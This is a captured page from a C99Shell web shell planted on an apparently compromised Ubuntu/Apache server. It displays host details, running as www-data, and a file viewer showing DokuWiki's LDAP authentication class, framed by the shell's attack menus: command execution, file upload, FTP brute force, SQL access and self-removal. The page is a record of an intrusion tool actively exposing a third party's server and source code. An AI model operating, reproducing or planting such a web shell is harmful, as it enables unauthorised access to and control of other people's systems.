!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/doku/axrepos/axess/old/wiki/inc/auth/   drwxrwxr-x
Free 11.5 GB of 97.11 GB (11.85%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ldap.class.php (12.71 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * LDAP authentication backend
 *
 * @license   GPL 2 (http://www.gnu.org/licenses/gpl.html)
 * @author    Andreas Gohr <andi@splitbrain.org>
 * @author    Chris Smith <chris@jalakaic.co.uk>
 */

class auth_ldap extends auth_basic {
    var 
$cnf null;
    var 
$con null;
    var 
$bound 0// 0: anonymous, 1: user, 2: superuser

    /**
     * Constructor
     */
    
function auth_ldap(){
        global 
$conf;
        
$this->cnf $conf['auth']['ldap'];

        
// ldap extension is needed
        
if(!function_exists('ldap_connect')) {
            if (
$this->cnf['debug'])
                
msg("LDAP err: PHP LDAP extension not found.",-1,__LINE__,__FILE__);
            
$this->success false;
            return;
        }

        if(empty(
$this->cnf['groupkey'])) $this->cnf['groupkey'] = 'cn';

        
// try to connect
        
if(!$this->_openLDAP()) $this->success false;

        
// auth_ldap currently just handles authentication, so no
        // capabilities are set
    
}

    
/**
     * Check user+password
     *
     * Checks if the given user exists and the given
     * plaintext password is correct by trying to bind
     * to the LDAP server
     *
     * @author  Andreas Gohr <andi@splitbrain.org>
     * @return  bool
     */
    
function checkPass($user,$pass){
        
// reject empty password
        
if(empty($pass)) return false;
        if(!
$this->_openLDAP()) return false;

        
// indirect user bind
        
if($this->cnf['binddn'] && $this->cnf['bindpw']){
            
// use superuser credentials
            
if(!@ldap_bind($this->con,$this->cnf['binddn'],$this->cnf['bindpw'])){
                if(
$this->cnf['debug'])
                    
msg('LDAP bind as superuser: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);
                return 
false;
            }
            
$this->bound 2;
        }else if(
$this->cnf['binddn'] &&
                 
$this->cnf['usertree'] &&
                 
$this->cnf['userfilter']) {
            
// special bind string
            
$dn $this->_makeFilter($this->cnf['binddn'],
                                     array(
'user'=>$user,'server'=>$this->cnf['server']));

        }else if(
strpos($this->cnf['usertree'], '%{user}')) {
            
// direct user bind
            
$dn $this->_makeFilter($this->cnf['usertree'],
                                     array(
'user'=>$user,'server'=>$this->cnf['server']));

        }else{
            
// Anonymous bind
            
if(!@ldap_bind($this->con)){
                
msg("LDAP: can not bind anonymously",-1);
                if(
$this->cnf['debug'])
                    
msg('LDAP anonymous bind: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);
                return 
false;
            }
        }

        
// Try to bind to with the dn if we have one.
        
if(!empty($dn)) {
            
// User/Password bind
            
if(!@ldap_bind($this->con,$dn,$pass)){
                if(
$this->cnf['debug']){
                    
msg("LDAP: bind with $dn failed", -1,__LINE__,__FILE__);
                    
msg('LDAP user dn bind: '.htmlspecialchars(ldap_error($this->con)),0);
                }
                return 
false;
            }
            
$this->bound 1;
            return 
true;
        }else{
            
// See if we can find the user
            
$info $this->getUserData($user,true);
            if(empty(
$info['dn'])) {
                return 
false;
            } else {
                
$dn $info['dn'];
            }

            
// Try to bind with the dn provided
            
if(!@ldap_bind($this->con,$dn,$pass)){
                if(
$this->cnf['debug']){
                    
msg("LDAP: bind with $dn failed", -1,__LINE__,__FILE__);
                    
msg('LDAP user bind: '.htmlspecialchars(ldap_error($this->con)),0);
                }
                return 
false;
            }
            
$this->bound 1;
            return 
true;
        }

        return 
false;
    }

    
/**
     * Return user info
     *
     * Returns info about the given user needs to contain
     * at least these fields:
     *
     * name string  full name of the user
     * mail string  email addres of the user
     * grps array   list of groups the user is in
     *
     * This LDAP specific function returns the following
     * addional fields:
     *
     * dn     string  distinguished name (DN)
     * uid    string  Posix User ID
     * inbind bool    for internal use - avoid loop in binding
     *
     * @author  Andreas Gohr <andi@splitbrain.org>
     * @author  Trouble
     * @author  Dan Allen <dan.j.allen@gmail.com>
     * @author  <evaldas.auryla@pheur.org>
     * @author  Stephane Chazelas <stephane.chazelas@emerson.com>
     * @return  array containing user data or false
     */
    
function getUserData($user,$inbind=false) {
        global 
$conf;
        if(!
$this->_openLDAP()) return false;

        
// force superuser bind if wanted and not bound as superuser yet
        
if($this->cnf['binddn'] && $this->cnf['bindpw'] && $this->bound 2){
            
// use superuser credentials
            
if(!@ldap_bind($this->con,$this->cnf['binddn'],$this->cnf['bindpw'])){
                if(
$this->cnf['debug'])
                    
msg('LDAP bind as superuser: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);
                return 
false;
            }
            
$this->bound 2;
        }elseif(
$this->bound == && !$inbind) {
            
// in some cases getUserData is called outside the authentication workflow
            // eg. for sending email notification on subscribed pages. This data might not
            // be accessible anonymously, so we try to rebind the current user here
            
$pass PMA_blowfish_decrypt($_SESSION[DOKU_COOKIE]['auth']['pass'],auth_cookiesalt());
            
$this->checkPass($_SESSION[DOKU_COOKIE]['auth']['user'], $pass);
        }

        
$info['user']   = $user;
        
$info['server'] = $this->cnf['server'];

        
//get info for given user
        
$base $this->_makeFilter($this->cnf['usertree'], $info);
        if(!empty(
$this->cnf['userfilter'])) {
            
$filter $this->_makeFilter($this->cnf['userfilter'], $info);
        } else {
            
$filter "(ObjectClass=*)";
        }

        
$sr     = @ldap_search($this->con$base$filter);
        
$result = @ldap_get_entries($this->con$sr);
        if(
$this->cnf['debug'])
            
msg('LDAP user search: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);

        
// Don't accept more or less than one response
        
if($result['count'] != 1){
            return 
false//user not found
        
}

        
$user_result $result[0];
        
ldap_free_result($sr);

        
// general user info
        
$info['dn']   = $user_result['dn'];
        
$info['gid']  = $user_result['gidnumber'][0];
        
$info['mail'] = $user_result['mail'][0];
        
$info['name'] = $user_result['cn'][0];
        
$info['grps'] = array();

        
// overwrite if other attribs are specified.
        
if(is_array($this->cnf['mapping'])){
            foreach(
$this->cnf['mapping'] as $localkey => $key) {
                if(
is_array($key)) {
                    
// use regexp to clean up user_result
                    
list($key$regexp) = each($key);
                    if(
$user_result[$key]) foreach($user_result[$key] as $grp){
                        if (
preg_match($regexp,$grp,$match)) {
                            if(
$localkey == 'grps') {
                                
$info[$localkey][] = $match[1];
                            } else {
                                
$info[$localkey] = $match[1];
                            }
                        }
                    }
                } else {
                    
$info[$localkey] = $user_result[$key][0];
                }
            }
        }
        
$user_result array_merge($info,$user_result);

        
//get groups for given user if grouptree is given
        
if ($this->cnf['grouptree'] && $this->cnf['groupfilter']) {
            
$base   $this->_makeFilter($this->cnf['grouptree'], $user_result);
            
$filter $this->_makeFilter($this->cnf['groupfilter'], $user_result);

            
$sr = @ldap_search($this->con$base$filter, array($this->cnf['groupkey']));
            if(!
$sr){
                
msg("LDAP: Reading group memberships failed",-1);
                if(
$this->cnf['debug'])
                    
msg('LDAP group search: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);
                return 
false;
            }
            
$result ldap_get_entries($this->con$sr);
            
ldap_free_result($sr);

            foreach(
$result as $grp){
                if(!empty(
$grp[$this->cnf['groupkey']][0])){
                    if(
$this->cnf['debug'])
                        
msg('LDAP usergroup: '.htmlspecialchars($grp[$this->cnf['groupkey']][0]),0,__LINE__,__FILE__);
                    
$info['grps'][] = $grp[$this->cnf['groupkey']][0];
                }
            }
        }

        
// always add the default group to the list of groups
        
if(!in_array($conf['defaultgroup'],$info['grps'])){
            
$info['grps'][] = $conf['defaultgroup'];
        }
        return 
$info;
    }

    
/**
     * Make LDAP filter strings.
     *
     * Used by auth_getUserData to make the filter
     * strings for grouptree and groupfilter
     *
     * filter      string  ldap search filter with placeholders
     * placeholders array   array with the placeholders
     *
     * @author  Troels Liebe Bentsen <tlb@rapanden.dk>
     * @return  string
     */
    
function _makeFilter($filter$placeholders) {
        
preg_match_all("/%{([^}]+)/"$filter$matchesPREG_PATTERN_ORDER);
        
//replace each match
        
foreach ($matches[1] as $match) {
            
//take first element if array
            
if(is_array($placeholders[$match])) {
                
$value $placeholders[$match][0];
            } else {
                
$value $placeholders[$match];
            }
            
$value $this->_filterEscape($value);
            
$filter str_replace('%{'.$match.'}'$value$filter);
        }
        return 
$filter;
    }

    
/**
     * Escape a string to be used in a LDAP filter
     *
     * Ported from Perl's Net::LDAP::Util escape_filter_value
     *
     * @author Andreas Gohr
     */
    
function _filterEscape($string){
        return 
preg_replace('/([\x00-\x1F\*\(\)\\\\])/e',
                            
'"\\\\\".join("",unpack("H2","$1"))',
                            
$string);
    }

    
/**
     * Opens a connection to the configured LDAP server and sets the wanted
     * option on the connection
     *
     * @author  Andreas Gohr <andi@splitbrain.org>
     */
    
function _openLDAP(){
        if(
$this->con) return true// connection already established

        
$this->bound 0;

        
$port = ($this->cnf['port']) ? $this->cnf['port'] : 389;
        
$this->con = @ldap_connect($this->cnf['server'],$port);
        if(!
$this->con){
            
msg("LDAP: couldn't connect to LDAP server",-1);
            return 
false;
        }

        
//set protocol version and dependend options
        
if($this->cnf['version']){
            if(!@
ldap_set_option($this->conLDAP_OPT_PROTOCOL_VERSION,
                                 
$this->cnf['version'])){
                
msg('Setting LDAP Protocol version '.$this->cnf['version'].' failed',-1);
                if(
$this->cnf['debug'])
                    
msg('LDAP version set: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);
            }else{
                
//use TLS (needs version 3)
                
if($this->cnf['starttls']) {
                    if (!@
ldap_start_tls($this->con)){
                        
msg('Starting TLS failed',-1);
                        if(
$this->cnf['debug'])
                            
msg('LDAP TLS set: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);
                    }
                }
                
// needs version 3
                
if(isset($this->cnf['referrals'])) {
                    if(!@
ldap_set_option($this->conLDAP_OPT_REFERRALS,
                       
$this->cnf['referrals'])){
                        
msg('Setting LDAP referrals to off failed',-1);
                        if(
$this->cnf['debug'])
                            
msg('LDAP referal set: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);
                    }
                }
            }
        }

        
//set deref mode
        
if($this->cnf['deref']){
            if(!@
ldap_set_option($this->conLDAP_OPT_DEREF$this->cnf['deref'])){
                
msg('Setting LDAP Deref mode '.$this->cnf['deref'].' failed',-1);
                if(
$this->cnf['debug'])
                    
msg('LDAP deref set: '.htmlspecialchars(ldap_error($this->con)),0,__LINE__,__FILE__);
            }
        }

        return 
true;
    }
}

//Setup VIM: ex: et ts=4 enc=utf-8 :

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0067 ]--